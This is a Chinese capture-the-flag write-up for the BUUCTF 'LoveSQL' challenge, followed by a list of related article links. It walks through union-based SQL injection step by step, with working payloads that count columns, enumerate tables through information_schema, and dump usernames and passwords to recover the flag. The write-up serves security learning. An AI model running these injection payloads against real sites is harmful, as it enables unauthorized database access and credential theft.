启动靶机

第一步

判断是否能sql注入

是可以的

第二步

万能密码

失败

第三步

获取查询结果有多少列

•order by 列序号(表示按第几列排序)
•1' order by 1# (不报错)
•1' order by 2# (不报错)
•1' order by 3# (不报错)

•1' order by 4# (报错)

说明结果有三列
第四步
寻找注入点
•-1' union select 1,2,3#
•id=-1表示查不到结果
•之前知道结果有3列,所以用1,2,3
•所以只会显示select 1,2,3中的2、3

第五步

显示数据库名

-1' union select 1,database(),3#

geek 为 数据库名

第六步

获取该数据库所有表名

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='geek '),3#

第七步

查询geekuser表中有哪些列名

-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='geek ' and table_name='geekuser'),3#
查geekuser表中的id 
-1' union select 1,(select id from geekuser limit 0, 1),3#
查geekuser表中的username
-1' union select 1,(select username from geekuser limit 0, 1),3#
查geekuser表中的password 
-1' union select 1,(select password from geekuser limit 0, 1),3#

查完显然对题目没啥帮助 ,接着查另一个表

查询l0ve1ysq1表中有哪些列名

-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),3#

查l0ve1ysq1表中的id

-1' union select 1,(select id from l0ve1ysq1 limit 0, 1),3#

查l0ve1ysq1表中的username

-1' union select 1,(select username from l0ve1ysq1 limit 0, 1),3#

查l0ve1ysq1表中的password

-1' union select 1,(select password from l0ve1ysq1 limit 0, 1),3#

按照查询结果填入发现错误

询问了我的老师及我的同学

flag藏在l0ve1ysq1表中的password中

而上一步查询password只查询了一个,并没有完全显示出来

应该用这个语句:1' union select 1,database(),group_concat(password) from l0ve1ysq1#

flag为最后一个password

亦或者用下面这个语句

1' union select 1,(select password from l0ve1ysq1 limit 15, 1),3#

直接显示最后一个password

flag:

flag{c0ee48ee-bf83-447e-a3d8-254eda826b93}

[极客大挑战 2019]LoveSQL1 个人李姐相关推荐

  1. [BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)

    [BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...

  2. BUUCTF Web [极客大挑战 2019]Havefun

    「作者主页」:士别三日wyx   此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...

  3. BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞

    PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼 ...

  4. BUUCTF Web 极客大挑战 2019 EasySQL

    BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...

  5. [极客大挑战 2019]FinalSQL

    [极客大挑战 2019]FinalSQL 依次点击5个页面 到最后一个页面发现提示尝试第6个页面,观察到url中的id,输入6得到 有参数,尝试单引号 提示error 那么应该存在sql注入,尝试永真 ...

  6. BUUCTF Web [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http

    目录 [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http [GXYCTF2019]Pin ...

  7. BUUCTF——web([GXYCTF2019]Ping Ping Ping、[极客大挑战 2019]Knife、[极客大挑战 2019]Http)

    BUUCTF-web [GXYCTF2019]Ping Ping Ping 做题思路 [极客大挑战 2019]Knife 做题思路 [极客大挑战 2019]Http 做题思路 [GXYCTF2019] ...

  8. 极客大挑战2019php,[极客大挑战 2019]PHP

    标签:spl   payload   sorry   min   private   lob   audio   ascii   sel 题目上说有备份的好习惯,扫描目录得到www.zip 几个重要p ...

  9. BUUCTF [极客大挑战 2019] PHP

    BUUCTF [极客大挑战 2019] PHP 启动靶机,打开页面: 提示为备份,尝试使用脚本扫描备份文件: Python备份文件扫描脚本参考本篇文章 判断应该存在备份文件:www.zip 下载得到源 ...

最新文章

  1. Pandas_transform的用法
  2. 心得丨吴恩达Deeplearning.ai 全部课程学习心得分享
  3. gif透明背景动画_前端基础系列之bmp、jpg、png、gif、svg常用图片格式浅谈(二)...
  4. ITK:二进制图像的近似距离图
  5. 第六章 Windows应用程序对键盘与鼠标的响应
  6. [设计模式] - 策略模式(Java篇)
  7. python partition只能切割一次吗_Python3的字符串方法
  8. ssh远程连接不上服务的处理过程总结
  9. 基于JAVA+Servlet+JSP+MYSQL的企业车库管理系统
  10. 【编译原理笔记02】计算机如何表示语言及其文法,字母表(及其运算)、串、推导和归约、句型和句子、文法分析树
  11. c语言色环电阻计算器源代码,色环电阻计算器最新版
  12. 毕业论文格式(图片题注引用,表格,公式格式)
  13. 网银支付接口编程资料汇总
  14. html表格内容自动换行符,html表格内容自动换行
  15. 外星人笔记本没有修复计算机,外星人笔记本的使用小技巧
  16. 【pkgs.org】linux/uinx依赖包源网站推荐+如何添加该网站到debian源
  17. 舆情分析报告写作的架构与方法|下
  18. 全面认识思科交换机产品
  19. 利用串口对 89S 系列单片机编程
  20. 我打碎了夕阳开头...

热门文章

  1. MySQL DBA 招聘小结
  2. 信息共享中心:生产日报表,问题统计表无纸化共享
  3. .netcore+vue 实现压缩文件下载
  4. 随笔记录rancher2.x配置pvc持久卷
  5. 依生生物港股上市遇挫:张译家族持股58%,疫苗市场竞争激烈
  6. 初识SpringBoot
  7. linux for循环套for循环格式_为什么for循环和aes八字不合
  8. Eclipse 单步调试
  9. Loj #2529. 「ZJOI2018」胖
  10. java将字符串遍历成数组_Java遍历字符串数组的几种方法